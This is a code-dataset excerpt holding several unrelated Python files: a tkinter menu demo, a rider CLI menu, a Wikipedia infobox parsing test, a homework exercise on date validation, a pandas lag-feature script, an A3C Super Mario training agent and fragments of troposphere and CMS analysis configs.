OrderedDict([(config_data.env_tag, config_data) for config_data in config_data_list])\n self.notes = notes\n\n def plan(self, temp_dir):\n pipeline = resolve_pipeline([(note.can_id, note.env_tag) for note in self.notes])\n nested_can_mapper = dict()\n returned_list = list()\n STOP_AT_IND = 4\n counter = 0\n for can_id_list, env_tag in pipeline:\n counter += 1\n deploy_workspace_dir = Path(temp_dir, '{}-{}'.format(str(counter).zfill(3), env_tag))\n deploy_workspace_dir.mkdir(parents=True, exist_ok=True)\n returned_list.append(deploy_workspace_dir)\n template_file_list = list()\n config_data = self.config_data_mapper[env_tag].data\n master_can_label = self.canlabel_mapper[self.master_canlabel_id]\n master_can = (master_can_label.can_class)(**config_data)\n master_can.CONFIG_DIR = deploy_workspace_dir.abspath\n master_can.create_template()\n master_template_path = Path(deploy_workspace_dir, master_can_label.filename)\n template_file_list.append(TemplateFile(template=(master_can.template),\n filepath=master_template_path))\n allowed_stack_id_list = [resource_id for resource_id in can_id_list if resource_id in master_can.TIER_LIST_TO_DEPLOY.get_value()]\n r_filter = ResourceFilter(allowed_stack_id_list)\n for resource_id, resource in list(master_can.template.resources.items()):\n keep_this_flag = r_filter.filter(resource, master_can.template)\n if not keep_this_flag:\n master_can.template.remove_resource(resource)\n else:\n if resource_id in self.canlabel_mapper:\n nested_canlabel = self.canlabel_mapper[resource_id]\n nested_can = (nested_canlabel.can_class)(**config_data)\n nested_can.create_template()\n nested_can_mapper[resource_id] = nested_can\n template_file = TemplateFile(template=(nested_can.template),\n filepath=(Path(deploy_workspace_dir, nested_canlabel.filename)))\n template_file_list.append(template_file)\n\n print('==========')\n print(can_id_list, env_tag)\n master_can.dump_cloudformation_json_config_file()\n for template_file in template_file_list:\n template_file.make_file(json_or_yml='json')\n\n return returned_list","sub_path":"pycfiles/troposphere_mate-0.0.14-py2.py3-none-any/orchestration.cpython-36.py","file_name":"orchestration.cpython-36.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388172202","text":"import tkinter.ttk as ttk\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.title(\"my GUI\")\nroot.geometry(\"640x480\")\n\n\ndef create_new_file():\n print(\"Creating a new file\")\n\ndef open_new_file():\n print(\"Open a new file\")\n\nmenu = Menu(root)\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label=\"New File\", command= create_new_file)\nmenu_file.add_command(label=\"New Window\")\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Open File...\", command = open_new_file)\n\nmenu_file.add_command(label=\"Save All\", state=\"disable\") #\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Exit\", command= root.quit)\nmenu.add_cascade(label=\"File\", menu=menu_file)\n#second casecade menu \nmenu.add_cascade(label=\"Edit\") \n\n#Adding language menu \nmenu_lang = Menu(menu, tearoff=0)\nmenu_lang.add_radiobutton(label=\"Python\")\nmenu_lang.add_radiobutton(label=\"Java\")\nmenu_lang.add_radiobutton(label=\"C++\")\nmenu.add_cascade(label=\"Programming Language\", menu=menu_lang) \n\n#checkbox \nmenu_view = Menu(menu, tearoff=0)\nmenu_view.add_checkbutton(label=\"Show Minimap\")\nmenu.add_cascade(label=\"View\", menu=menu_view)\n\nroot.config(menu=menu)\n\n\nroot.mainloop()","sub_path":"gui_basic/reference_pys/10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"272105454","text":"from CheckPickupJobsScreen import *\nfrom CheckDropOffJobsScreen import *\nfrom UpdateOrderProgressScreen import *\n\ndef riderScreen(rider):\n ans = \"ON\"\n while ans:\n print(\"\"\"\n Welcome back, \"\"\" + rider.getFirstName() + \"\"\"\n 1.Check pick up jobs\n 2.Check drop off jobs\n 3.Update order progress\n 4.Back\n \"\"\")\n #stores the users input\n ans = input(\"What would you like to do? \")\n \n if(ans == \"1\"):\n #loads the check pickup jobs screen method\n checkPickupJobsScreen(rider)\n elif(ans == \"2\"):\n #loads the check drop off jobs screen method\n checkDropOffJobsScreen(rider)\n elif(ans == \"3\"):\n #loads the update order progress method\n updateOrderProgress(rider)\n elif(ans == \"4\"):\n #stops the while loop which loads the previous screen method\n ans = None\n","sub_path":"RiderScreen.py","file_name":"RiderScreen.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"292016278","text":"import gzip\nimport json\nimport os\nimport re\nimport unittest\n\n\ndef united_kingdom(filepath):\n with gzip.open(filepath, 'rt') as data:\n for datum in data:\n article = json.loads(datum)\n if article['title'] == 'イギリス':\n return article['text']\n\n\ndef infobox_without_emphasis(text):\n return dict([[key, re.sub(\"'{2,3}|'{5}\", '', value)]\n for key, value in re.findall('\\|(.*?) = (.*)', text)])\n\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n self.filepath = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n os.pardir,\n 'data',\n 'jawiki-country.json.gz')\n self.text = united_kingdom(self.filepath)\n\n def test_infobox_without_emphasis(self):\n actual = infobox_without_emphasis(self.text)\n expected = {'略名': 'イギリス',\n '日本語国名': 'グレートブリテン及び北アイルランド連合王国',\n '公式国名': ('{{lang|en|United Kingdom of Great Britain '\n 'and Northern Ireland}}英語以外での正式国名:
'),\n '国旗画像': 'Flag of the United Kingdom.svg',\n '国章画像': ('[[ファイル:Royal Coat of Arms of '\n 'the United Kingdom.svg|85px|イギリスの国章]]'),\n '国章リンク': '([[イギリスの国章|国章]])',\n '標語': ('{{lang|fr|Dieu et mon droit}}
'\n '([[フランス語]]:神と私の権利)'),\n '国歌': '[[女王陛下万歳|神よ女王陛下を守り給え]]',\n '位置画像': 'Location_UK_EU_Europe_001.svg',\n '公用語': '[[英語]](事実上)',\n '首都': '[[ロンドン]]',\n '最大都市': 'ロンドン',\n '元首等肩書': '[[イギリスの君主|女王]]',\n '元首等氏名': '[[エリザベス2世]]',\n '首相等肩書': '[[イギリスの首相|首相]]',\n '首相等氏名': '[[デーヴィッド・キャメロン]]',\n '面積順位': '76',\n '面積大きさ': '1 E11',\n '面積値': '244,820',\n '水面積率': '1.3%',\n '人口統計年': '2011',\n '人口順位': '22',\n '人口大きさ': '1 E7',\n '人口値': ('63,181,775[http://esa.un.org/unpd/wpp/'\n 'Excel-Data/population.htm United Nations '\n 'Department of Economic and Social Affairs'\n '>Population Division>Data>Population>Total '\n 'Population]'),\n '人口密度値': '246',\n 'GDP統計年元': '2012',\n 'GDP値元': ('1兆5478億'\n '[http://www.imf.org/external/pubs/ft/weo/'\n '2012/02/weodata/weorept.aspx?pr.x=70&pr.y=13'\n '&sy=2010&ey=2012&scsm=1&ssd=1&sort=country&ds=.'\n '&br=1&c=112&s=NGDP%2CNGDPD%2CPPPGDP%2CPPPPC'\n '&grp=0&a= IMF>Data and Statistics>'\n 'World Economic Outlook Databases>'\n 'By Countrise>United Kingdom]'),\n 'GDP統計年MER': '2012',\n 'GDP順位MER': '5',\n 'GDP値MER': '2兆4337億',\n 'GDP統計年': '2012',\n 'GDP順位': '6',\n 'GDP値': '2兆3162億',\n 'GDP/人': '36,727',\n '建国形態': '建国',\n '確立形態1': ('[[イングランド王国]]/[[スコットランド王国]]'\n '
(両国とも[[連合法 (1707年)|1707年連合法]]まで)'),\n '確立年月日1': '[[927年]]/[[843年]]',\n '確立形態2': ('[[グレートブリテン王国]]建国
'\n '([[連合法 (1707年)|1707年連合法]])'),\n '確立年月日2': '[[1707年]]',\n '確立形態3': ('[[グレートブリテン及びアイルランド連合王国]]建国'\n '
([[連合法 (1800年)|1800年連合法]])'),\n '確立年月日3': '[[1801年]]',\n '確立形態4': \"現在の国号「グレートブリテン及び北アイルランド連合王国」に変更\",\n '確立年月日4': '[[1927年]]',\n '通貨': '[[スターリング・ポンド|UKポンド]] (£)',\n '通貨コード': 'GBP',\n '時間帯': '±0',\n '夏時間': '+1',\n 'ISO 3166-1': 'GB / GBR',\n 'ccTLD': '[[.uk]] / [[.gb]]使用は.ukに比べ圧倒的少数。',\n '国際電話番号': '44',\n '注記': ''}\n self.assertEqual(actual, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"code/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"13876501","text":"# Задание-1: уравнение прямой вида y = kx + b задано в виде строки.\n# Определить координату y точки с заданной координатой x.\n# вычислите и выведите y\n#\n# equation = 'y = -12x + 11111140.2121'\n# x = 2.5\n# подсказка: x у вас уже есть, остается с помощью срезов получить значения k и b,\n# а затем вевести итоговый результат: print('y = {}'.format(k * x + b))\n\n# 1\nprint(\"1st part:\")\n# y = kx + b\nequation = \"y = -12x + 11111140.2121\"\nx = 2.5\n# equation = (-12 * 2.5) = -30 + 11111140.2121\"\nk = int(equation[4:7])\nb = float(equation[-13:])\nprint(\"y = {}\".format(k * x + b))\n\n\n# Задание-2: Дата задана в виде строки формата 'dd.mm.yyyy'.\n# Проверить, корректно ли введена дата.\n# Условия корректности:\n\n# 1. Длина исходной строки для частей должна быть в соответствии с форматом\n# (т.е. 2 символа (числа) для дня, 2 - для месяца, 4 - для года)\n\n# 2. День должен приводиться к целому числу в диапазоне от 1 до 30(31)\n# (в зависимости от месяца, февраль не учитываем)\n# 3. Месяц должен приводиться к целому числу в диапазоне от 1 до 12\n# 4. Год должен приводиться к целому положительному числу в диапазоне от 1 до 9999\n\n# 2\nprint(\"2nd part:\")\ndate = input(\"Enter date (dd.mm.yyyy):\\n\")\n\ndate_list = date.split(\".\")\n\ndate_length = 0 # initial value\nfor i in date_list:\n date_length += len(i)\n\ncorrect_date_length= 8\nmax_day = 31\nmax_month = 12\nmax_year = 9999\n\nday = int(date_list[0])\nmonth = int(date_list[1])\nyear = int(date_list[2])\n\nif date_length != correct_date_length:\n print(\"Invalid date format\")\nelif max_day < day or day < 0:\n print(\"Invalid day\")\nelif max_month < month or month < 0:\n print(\"Invalid month\")\nelif max_year < year or max_year < 0:\n print(\"Invalid year\")\nelse:\n print(\"Correct date format\")","sub_path":"lesson_02/home_work/hw02_hard.py","file_name":"hw02_hard.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246185294","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport functools\nimport sys\nimport getopt\n\ndef main():\n try: \n argv = sys.argv[1:]\n opts, args = getopt.getopt(argv,\"a:i:c:p:f:s:\",[\"allcol=\", \"ifile=\", \"col=\",\"plag=\", \"flag=\", \"show=\"])\n except:\n return None\n\n input_file = None\n input_file = \"yc_change_1_19950104_20180531.csv\"\n target_col = None\n all_col = False\n plag = 5\n flag = 1\n show = False\n \n for o, a in opts:\n if o in (\"-i\", \"--ifile\"):\n input_file = a\n elif o in (\"-a\", \"--allcol\"):\n all_col = True\n elif o in (\"-c\", \"--col\"):\n target_col = a\n elif o in (\"-p\", \"--plag\"): \n plag = int(a) \n elif o in (\"-f\", \"--flag\"):\n flag = int(a)\n elif o in (\"-s\", \"--show\"):\n show = int(a)\n \n if input_file is None:\n input_file = \"sample_data.csv\"\n print(\"Using sample data... Please specify input_file and target_col with -i and -c\")\n \n if target_col is None:\n target_col = \"EURUSD\"\n print(\"Using sample column (EURUSD)... Please specify input_file and target_col with -i and -c\") \n \n if all_col:\n all_col_run(input_file, plag, flag)\n else:\n run(input_file, target_col, plag, flag, show)\n \n \ndef mdy(date_vector):\n out_date = []\n for d in date_vector: \n out_date.append(datetime.strptime(d, \"%m/%d/%Y\"))\n \n return out_date\n\ndef add_lag_columns(sub_df, pastlag_upto = 5, fwdlag_upto = 1, target_col = None):\n if target_col is None:\n colname = sub_df.columns.values[0]\n else: \n colname = target_col\n \n if pastlag_upto > 0:\n for i in np.arange(pastlag_upto+1):\n temp_name = \"p_\" + target_col + \"_\" + str(i)\n with pd.option_context('mode.chained_assignment', None):\n sub_df.loc[:,temp_name] = sub_df[colname].shift(i)\n \n if fwdlag_upto > 0:\n for i in 1+np.arange(fwdlag_upto):\n temp_name = \"f_\" + target_col + \"_\" + str(i)\n with pd.option_context('mode.chained_assignment', None):\n sub_df.loc[:,temp_name] = sub_df[colname].shift(-i)\n \n fdf = sub_df.drop([colname], axis = 1)\n \n return fdf\n\ndef all_col_run(input_file, plag, flag):\n df = pd.read_csv(input_file)\n df[\"Date\"] = mdy(df[\"Date\"])\n df = df.set_index([\"Date\"])\n df_all = []\n for target_col in df.columns.values: \n sub_df = df[[target_col]] \n df_wlag = add_lag_columns(sub_df, plag, flag, target_col)\n df_all.append(df_wlag)\n \n fdf = functools.reduce(lambda x, y: pd.merge(x, y, left_index = True, right_index = True, how = \"outer\", sort = True), df_all)\n fdf.index.names = ['Date']\n output_name = input_file.split(\".\")[0] + \"_\" + str(plag) + \"_\" + str(flag) + \".csv\"\n \n fdf.to_csv(output_name)\n print(\"All Columns: Output Successful!\")\n \ndef run(input_file, target_col, plag, flag, show): \n #Import\n df = pd.read_csv(input_file)\n # df.columns[0] = \"Date\"\n if show:\n print(df.columns)\n sys.exit()\n \n #Clean\n df[\"Date\"] = mdy(df[\"Date\"])\n df = df.set_index([\"Date\"])\n \n #Subset\n sub_df = df[[target_col]]\n \n #Transform and Modify\n \n #Add Lags\n df_wlag = add_lag_columns(sub_df, plag, flag, target_col)\n \n #Final Clean\n \n #Output\n output_name = target_col + \"_\" + str(plag) + \"_\" + str(flag) + \".csv\"\n df_wlag.to_csv(output_name)\n print(\"Output Successful!\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Archive/Step1_PrepareData/PreData.py","file_name":"PreData.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335443391","text":"import gym_super_mario_bros\nfrom src.actions import REALLY_COMPLEX_MOVEMENT\nfrom nes_py.wrappers import BinarySpaceToDiscreteSpaceEnv\nfrom keras.layers import Dense, Flatten, Input, Conv2D, MaxPooling2D, Dropout, concatenate\n#from keras.layers.convolutional import Conv2D\nfrom keras.optimizers import RMSprop, Adam\nfrom keras import backend as K\nfrom keras.models import Model\nimport tensorflow as tf\nimport numpy as np\nimport threading\nimport random\nimport time\nimport gym\n\n\n\ndef to_grayscale(img):\n return np.mean(img, axis=2).astype(np.uint8)\ndef downsample(img):\n return img[47:223:2, 0:256:2]\ndef expand_dimension(img):\n return np.expand_dims(img, axis=2)\ndef preprocess(img):\n return expand_dimension(to_grayscale(downsample(img)))\n\naction_size = 13\n# Initialize Global Variables\nglobal episode\nepisode = 0\nglobal thread_num\nthread_num = 1\nEPISODES = 8000000\n\n\n\n\n# Global Network\nclass A3CAgent:\n def __init__(self, action_size):\n self.state_size = (88, 128, 4)\n self.action_size = action_size\n # A3C Parameters\n self.discount_factor = 0.99\n self.actor_lr = 0.0017\n self.critic_lr = 0.0017\n # Number of Threads\n self.threads = 8\n # Loading model weights\n self.if_load_model = False\n # Building Global Network\n self.actor, self.critic = self.build_model()\n\n\n\n # Customized optimizer for entropy calculation\n self.optimizer = [self.actor_optimizer(), self.critic_optimizer()]\n\n # Applying Tensorboard\n self.sess = tf.InteractiveSession()\n K.set_session(self.sess)\n self.sess.run(tf.global_variables_initializer())\n if self.if_load_model:\n self.load_model('./save/Mario_A3C_DQN_2')\n print('Weight Loaded')\n self.summary_placeholders, self.update_ops, self.summary_op = \\\n self.setup_summary()\n self.summary_writer = \\\n tf.summary.FileWriter('summary/Mario_A3C_DQN_2', self.sess.graph)\n\n # Activating thread for training\n def train(self):\n # Initializing agents\n agents = [Agent(self.action_size, self.state_size,\n [self.actor, self.critic], self.sess,\n self.optimizer, self.discount_factor,\n [self.summary_op, self.summary_placeholders,\n self.update_ops, self.summary_writer])\n for _ in range(self.threads)]\n\n # Activating each agents\n for agent in agents:\n time.sleep(1)\n agent.start()\n\n # Save model every 10 min(60 sec)\n while True:\n time.sleep(60 * 10)\n self.save_model(\"./save/Mario_A3C_DQN_2\")\n print('weight saved:', time.localtime())\n\n # Building policy and value network\n def build_model(self):\n input = Input(shape=self.state_size)\n conv1 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(input)\n conv1 = Conv2D(64, (3, 3), padding = 'same', activation='relu')(conv1)\n # Simplifying network from original DQN\n #conv = Conv2D(128, (2, 2), strides=(1, 1), activation='relu')(conv)\n conv2 = Conv2D(32, (1, 1), padding = 'same', activation='relu')(input)\n conv2 = Conv2D(32, (5, 5), padding = 'same', activation='relu')(conv2)\n\n conv3 = MaxPooling2D((3, 3), strides=(1, 1), padding = 'same')(input)\n conv3 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(conv3)\n\n concat = concatenate([conv1, conv2, conv3], axis = 3)\n\n conv = Flatten()(concat)\n # Simplifying network from original DQN\n #fc = Dense(512, activation='relu')(conv)\n fc = Dense(256)(conv)\n\n # Using softmax function to make probability\n policy = Dense(self.action_size, activation='softmax')(fc)\n value = Dense(1)(fc)\n\n actor = Model(inputs=input, outputs=policy)\n critic = Model(inputs=input, outputs=value)\n\n # Making predicting function\n # According to textbook, this is not for training itself\n # For preventing error in multi-threading\n actor._make_predict_function()\n critic._make_predict_function()\n\n actor.summary()\n critic.summary()\n\n return actor, critic\n\n # Customized optimizer for updating policy network\n def actor_optimizer(self):\n action = K.placeholder(shape=[None, self.action_size])\n advantages = K.placeholder(shape=[None, ])\n\n policy = self.actor.output\n\n # Policy cross-entropy loss function\n action_prob = K.sum(action * policy, axis=1)\n cross_entropy = K.log(action_prob + 1e-10) * advantages\n cross_entropy = -K.sum(cross_entropy)\n\n # Entropy loss for continuous exploration\n entropy = K.sum(policy * K.log(policy + 1e-10), axis=1)\n entropy = K.sum(entropy)\n\n # Final loss function using both entropy\n loss = cross_entropy + 0.01 * entropy\n\n optimizer = RMSprop(lr=self.actor_lr, rho=0.99, epsilon=0.01, clipnorm=40)\n updates = optimizer.get_updates(self.actor.trainable_weights, [], loss)\n train = K.function([self.actor.input, action, advantages],\n [loss], updates=updates)\n return train\n\n # Customized optimizer for updating value network\n def critic_optimizer(self):\n discounted_prediction = K.placeholder(shape=(None,))\n\n value = self.critic.output\n\n # Square of [Return - Value] for loss function\n loss = K.mean(K.square(discounted_prediction - value))\n\n optimizer = RMSprop(lr=self.critic_lr, rho=0.99, epsilon=0.01)\n updates = optimizer.get_updates(self.critic.trainable_weights, [],loss)\n train = K.function([self.critic.input, discounted_prediction],\n [loss], updates=updates)\n return train\n\n def load_model(self, name):\n self.actor.load_weights(name + \"_actor.h5\")\n self.critic.load_weights(name + \"_critic.h5\")\n\n def save_model(self, name):\n self.actor.save_weights(name + \"_actor.h5\")\n self.critic.save_weights(name + \"_critic.h5\")\n\n # Recording training information each episode\n def setup_summary(self):\n episode_total_reward = tf.Variable(0.)\n episode_avg_max_q = tf.Variable(0.)\n episode_duration = tf.Variable(0.)\n\n tf.summary.scalar('Total Reward/Episode', episode_total_reward)\n tf.summary.scalar('Average Max Prob/Episode', episode_avg_max_q)\n tf.summary.scalar('Duration/Episode', episode_duration)\n\n summary_vars = [episode_total_reward,\n episode_avg_max_q,\n episode_duration]\n\n summary_placeholders = [tf.placeholder(tf.float32)\n for _ in range(len(summary_vars))]\n update_ops = [summary_vars[i].assign(summary_placeholders[i])\n for i in range(len(summary_vars))]\n summary_op = tf.summary.merge_all()\n return summary_placeholders, update_ops, summary_op\n\n\n# Actor-Runner class(Thread)\nclass Agent(threading.Thread):\n def __init__(self, action_size, state_size, model, sess,\n optimizer, discount_factor, summary_ops):\n threading.Thread.__init__(self)\n\n # Inherit from A3CAgent\n global thread_num\n self.thread_num = thread_num\n thread_num += 1\n self.action_size = action_size\n self.state_size = state_size\n self.actor, self.critic = model\n self.sess = sess\n self.optimizer = optimizer\n self.discount_factor = discount_factor\n\n [self.summary_op, self.summary_placeholders,\n self.update_ops, self.summary_writer] = summary_ops\n\n # Memory for samples, emptied every t_max time steps\n self.states, self.actions, self.rewards = [], [], []\n\n # Building local network\n self.local_actor, self.local_critic = self.build_local_model()\n\n self.avg_p_max = 0\n self.avg_loss = 0\n\n # Model update rate\n self.t_max = 30\n self.t = 0\n\n def run(self):\n global episode\n env = gym_super_mario_bros.make('SuperMarioBros-1-1-v3')\n env = BinarySpaceToDiscreteSpaceEnv(env, REALLY_COMPLEX_MOVEMENT)\n step = 0\n\n while episode < EPISODES:\n done = False\n\n max_x = 40\n no_progress = 0\n score = 0\n state = env.reset()\n\n # Making initial history with random actions\n for _ in range(5):\n next_state = state\n state, _, _, _ = env.step(0)\n\n state = preprocess(state)\n history = np.stack((state, state, state, state), axis=2)\n history = np.reshape([history], (1, 88, 128, 4))\n\n while not done:\n # Rendering code\n # Seems to be causing error in Mac OS\n if self.thread_num==1:\n env.render()\n step += 1\n self.t += 1\n\n step_reward = 0\n\n action, policy = self.get_action(history)\n\n # Taking 3 steps with selected action\n # Mimicking frame skip\n for _ in range(6):\n next_state, reward, done, info = env.step(action)\n score += reward\n step_reward += reward\n if done:\n break\n\n # Kill Mario if Mario is making no progress for 10 seconds\n x_now = info.get('x_pos')\n # Handling exception x_pos = 65535\n if x_now == 65535:\n x_now = max_x\n if max_x <= x_now:\n max_x = x_now\n no_progress = 0\n else:\n no_progress += 1\n if no_progress == 150:\n done = True\n reward -= 1\n step_reward -= 1\n score -= 1\n print(\"#\",self.thread_num, \" STUCK\")\n\n # Preprocessing each states\n next_state = preprocess(next_state)\n next_state = np.reshape([next_state], (1, 88, 128, 1))\n next_history = np.append(next_state, history[:, :, :, :3],\n axis=3)\n\n # Average policy max value\n self.avg_p_max += np.amax(self.actor.predict(\n np.float32(history / 255.)))\n\n\n # Appending sample\n self.append_sample(history, action, step_reward)\n history = next_history\n if self.t >= self.t_max or done:\n #if done:\n self.train_model(done)\n self.update_local_model()\n self.t = 0\n\n if done:\n # Recording training information\n\n episode += 1\n print(\"#\", self.thread_num, \" episode:\", episode, \" score:\", format(score, '.2f'), \" step:\",\n step, \"max_x :\", max_x)\n\n stats = [score, self.avg_p_max / float(step),\n step]\n for i in range(len(stats)):\n self.sess.run(self.update_ops[i], feed_dict={\n self.summary_placeholders[i]: float(stats[i])\n })\n summary_str = self.sess.run(self.summary_op)\n self.summary_writer.add_summary(summary_str, episode + 1)\n self.avg_p_max = 0\n self.avg_loss = 0\n step = 0\n\n\n # Calculating discounted prediction for future reward\n def discounted_prediction(self, rewards, done):\n discounted_prediction = np.zeros_like(rewards)\n running_add = 0\n\n if not done:\n running_add = self.critic.predict(np.float32(\n self.states[-1] / 255.))[0]\n\n for t in reversed(range(0, len(rewards))):\n running_add = running_add * self.discount_factor + rewards[t]\n discounted_prediction[t] = running_add\n return discounted_prediction\n\n # Update networks\n def train_model(self, done):\n discounted_prediction = self.discounted_prediction(self.rewards, done)\n\n states = np.zeros((len(self.states), 88, 128, 4))\n for i in range(len(self.states)):\n states[i] = self.states[i]\n\n states = np.float32(states / 255.)\n\n values = self.local_critic.predict(states)\n values = np.reshape(values, len(values))\n\n advantages = discounted_prediction - values\n\n self.optimizer[0]([states, self.actions, advantages])\n self.optimizer[1]([states, discounted_prediction])\n self.states, self.actions, self.rewards = [], [], []\n\n\n # Building local networks\n def build_local_model(self):\n input = Input(shape=self.state_size)\n conv1 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(input)\n conv1 = Conv2D(64, (3, 3), padding = 'same', activation='relu')(conv1)\n # Simplifying network from original DQN\n #conv = Conv2D(128, (2, 2), strides=(1, 1), activation='relu')(conv)\n conv2 = Conv2D(32, (1, 1), padding = 'same', activation='relu')(input)\n conv2 = Conv2D(32, (5, 5), padding = 'same', activation='relu')(conv2)\n\n conv3 = MaxPooling2D((3, 3), strides=(1, 1), padding = 'same')(input)\n conv3 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(conv3)\n\n concat = concatenate([conv1, conv2, conv3], axis = 3)\n\n conv = Flatten()(concat)\n # Simplifying network from original DQN\n #fc = Dense(512, activation='relu')(conv)\n fc = Dense(256)(conv)\n\n policy = Dense(self.action_size, activation='softmax')(fc)\n value = Dense(1)(fc)\n\n local_actor = Model(inputs=input, outputs=policy)\n local_critic = Model(inputs=input, outputs=value)\n\n local_actor._make_predict_function()\n local_critic._make_predict_function()\n\n # Synchronizing with global network\n local_actor.set_weights(self.actor.get_weights())\n local_critic.set_weights(self.critic.get_weights())\n\n local_actor.summary()\n local_critic.summary()\n\n return local_actor, local_critic\n\n # Synchronizing with global network\n def update_local_model(self):\n self.local_actor.set_weights(self.actor.get_weights())\n self.local_critic.set_weights(self.critic.get_weights())\n\n # Selecting action from output of policy network\n def get_action(self, history):\n history = np.float32(history / 255.)\n policy = self.local_actor.predict(history)[0]\n np.random.seed(random.randint(0, 100))\n action_index = np.random.choice(self.action_size, 1, p=policy)[0]\n return action_index, policy\n\n # Using Epsilon-greedy method, but seems to be not needed\n def get_action2(self, history):\n history = np.float32(history / 255.0)\n policy = self.local_actor.predict(history)[0]\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size), policy\n action_index = np.random.choice(self.action_size, 1, p=policy)[0]\n return action_index, policy # returns action\n\n # Appending sample\n def append_sample(self, history, action, reward):\n self.states.append(history)\n act = np.zeros(self.action_size)\n act[action] = 1\n self.actions.append(act)\n self.rewards.append(reward)\n\n\nif __name__ == \"__main__\":\n global_agent = A3CAgent(action_size)\n global_agent.train()","sub_path":"backup/old_codes/Mario_A3C_DQN2.py","file_name":"Mario_A3C_DQN2.py","file_ext":"py","file_size_in_byte":15738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"489504743","text":"import FWCore.ParameterSet.Config as cms\n\n# analyse muon quantities\nprocess = cms.Process(\"Selection\")\n\n## configure message logger\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10000 # !!!\n\n##\n## comment for genTag begin\n##\n\n\n\n##\n## comment for genTag end\n##\n\n\n## define input\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring( \n ## add your favourite file here\n '/store/user/rwolf/ttbar09/patTuple_all_0_ttbar09.root',\n '/store/user/rwolf/ttbar09/patTuple_all_1_ttbar09.root',\n '/store/user/rwolf/ttbar09/patTuple_all_2_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_3_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_4_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_5_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_6_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_7_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_8_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_9_ttbar09.root'\n\t\t\t \n\t\t\t \n## '/store/user/henderle/OctEx/Wmunu/PATtuple_1.root',\n## \t'/store/user/henderle/OctEx/Wmunu/PATtuple_2.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_3.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_4.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_5.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_6.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_7.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_8.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_9.root',\n## \t\t\t'/store/user/henderle/OctEx/Wmunu/PATtuple_10.root'\n )\n)\n\n## define maximal number of events to loop over\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(200000)\n)\n\n## configure process options\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True)\n)\n\n## register TFileService\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('analyzeFullLeptonicSelection.root')\n)\n\n\n## std sequence to produce the ttGenEvt\nprocess.load(\"TopQuarkAnalysis.TopEventProducers.sequences.ttGenEvent_cff\")\n\n## filter for different ttbar decay channels\nprocess.load(\"TopQuarkAnalysis.TopEventProducers.producers.TtDecaySelection_cfi\")\nprocess.ttDecaySelection.allowedTopDecays.decayBranchA.muon = True\nprocess.ttDecaySelection.allowedTopDecays.decayBranchB.electron = True\n\n## filter for differnt final states on generator level\nprocess.load(\"TopAnalysis.TopUtils.GenFinalStateSelector_cfi\")\n\n## number of expected electrons in the final state\nprocess.genFinalStateSelector.elecs = -1\n#process.genFinalStateSelector.invert = True\n\n\n## high level trigger filter\nprocess.load(\"TopAnalysis.TopFilter.sequences.triggerFilter_cff\")\n\n\n## top decay channel analyzer\nprocess.load(\"Validation.Generator.TopDecayChannelDQM_cfi\")\n\n\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\nprocess.DQM.collectorHost = ''\n\nprocess.dqmSaver.workflow = cms.untracked.string('/Test/TopDecayChannelDQM/DataSet')\n\n\n## sequence with filter for decay channel\nprocess.genFilterSequence = cms.Sequence(process.makeGenEvt *\n ## process.ttDecaySelection\n process.genFinalStateSelector\n )\n\n## sequence with filter for trigger selection\nprocess.recFilterSequence = cms.Sequence(process.hltEle15\n )\n\n## ## sequence with filter for optimal electrons --> jet analysis\n## from PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import 